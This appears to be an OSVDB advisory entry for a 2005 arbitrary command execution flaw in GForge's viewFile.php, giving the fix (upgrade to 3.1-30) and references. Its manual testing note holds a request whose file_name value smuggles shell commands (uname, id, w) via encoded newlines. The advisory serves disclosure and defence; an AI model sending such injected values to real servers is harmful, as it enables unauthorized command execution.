GForge viewFile.php file_name Parameter Arbitrary Command Execution

2005-05-24T04:21:03
ID: OSVDB:16930
Type: osvdb
Reporter: OSVDB
Modified: 2005-05-24T04:21:03

Description

Solution Description

Upgrade to version 3.1-30 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

/scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a

References:

Vendor URL: http://gforge.org/
Secunia Advisory ID: 13845
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0268.html
CVE-2005-1752
Bugtraq ID: 13716